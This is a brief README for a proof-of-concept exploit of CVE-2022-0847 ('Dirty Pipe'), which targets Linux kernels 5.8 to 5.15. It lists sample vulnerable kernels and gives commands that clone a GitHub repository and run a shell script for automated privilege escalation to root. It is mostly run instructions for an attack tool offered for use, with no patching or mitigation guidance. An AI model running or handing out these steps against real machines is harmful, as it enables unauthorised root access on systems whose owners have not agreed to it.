
Proof-of-concept exploit for CVE-2022-0847 (Dirty Pipe) targeting Linux kernel versions 5.8–5.15. Provides reproduction environment setup and automated privilege escalation via a shell script.
CVE-2022-0847 POC
Link:https://dirtypipe.cm4all.com/
The vulnerability exists in Ubuntu kernel versions starting from v5.8 all the way up to 5.15
like Linux 5.14.0-9parrot1-amd64
Linux kali 5.10.0-kali7-amd64 #1 SMP Debian 5.10.28-1kali1 (2021-04-12) x86_64 GNU/Linux
gcc
git clone https://github.com/imfiver/CVE-2022-0847.git
cd CVE-2022-0847
chmod +x Dirty-Pipe.sh
bash Dirty-Pipe.sh
